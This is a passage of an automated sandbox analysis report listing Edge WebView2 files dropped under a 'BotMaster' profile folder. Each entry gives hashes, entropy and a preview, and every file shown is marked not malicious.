                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Local State~RF619562.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Local State~RF627e1c.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                Entropy (8bit):5.743922315764097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YKWJu5rrtCdtm4hjhKZAFeCEBZtDaeCUWO3tbvXzQQRCYfYg:Yqf+tm4h8dBrZH3BvsB0
                                                                                                                                                                                                                MD5:BD043F65ABDE722A61603E9AE5A93ECE
                                                                                                                                                                                                                SHA1:1D8190904925234F6C51FD05A1DE21708BB54A30
                                                                                                                                                                                                                SHA-256:E77ECCE517711D6DCCFBC7CF2FC60630944A7299050913D0E3F4F7067C488784
                                                                                                                                                                                                                SHA-512:4310CAFDE17394A4059A2B6ABDFC42DEDA4B6E89EA60A79E5AFFAD5C0D7965D950B4FFF30DEE751F0C0A2DBAF115FF7F5D9CBB36CAA5A851484A32A032365180
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABPx5s/g90WQL1OExW01Io6EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACRqq4Bb8RSJdGlFvruS9pdkK0RIMs6Pu3xEo/J7IOqpQAAAAAOgAAAAAIAACAAAABX1+rzruERe/K3LUnyPox/iShmkj700vv2ZlPpdNbbGDAAAABVXX9uAxc/A2fdoMyjMJCahnmQQse5QY37RRfdKmGWhq/WOoeG913Hg+OHx/Ln8RdAAAAA8MU+gIUsR7jlYm1jnZKZZ4ElTleFZ041M77vyPBpN1gRHds4cTfK1zaQk6Y+CAsaiPLjZ3jgTFHXa5735+QlUQ=="},"uninstall_metrics":{"installation_date2":"1710089160"},"user_experience_metrics":{"client_id2":"{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}C:\\Users\\user0s:92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A","diagnostics":{"last_data_collection_level_on_launch":1},"low_entropy_source3":3881,"pseudo_low_entropy_source":3992,"reset_client_id_deterministic":true,"stability":{"browser_last_live_timestamp":"13354562760777749","stats_buildtime":"1695934310","stats_version":"117.0.2045.47-64","system_crash_count":0}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\ShaderCache\data_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\ShaderCache\data_1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\ShaderCache\data_2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\ShaderCache\data_3

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\ShaderCache\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:LsNlrl/l:Ls35
                                                                                                                                                                                                                MD5:C75ED1573CEA7AEB28F6017F434F2EC0
                                                                                                                                                                                                                SHA1:2555EBA1A2D628E857FD20B8949D049B1F0095D5
                                                                                                                                                                                                                SHA-256:B7CF7C6FA439444A9264DDD0B2FF78045FB02BB92E023C00D3A1D7C97834BD3A
                                                                                                                                                                                                                SHA-512:A1B9A384610BE2E802A68298A0B7D7CBDED0E5ED0CDD43A5DC28F83A41E3412E2DD69A0B83D655CF608C5E14444D407022D5343B74E6A513EF8C8EF20FF413B6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:........................................d..q.q/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:customSynchronousLookupUris_0

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35302
                                                                                                                                                                                                                Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3581
                                                                                                                                                                                                                Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35302
                                                                                                                                                                                                                Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                Malicious:false
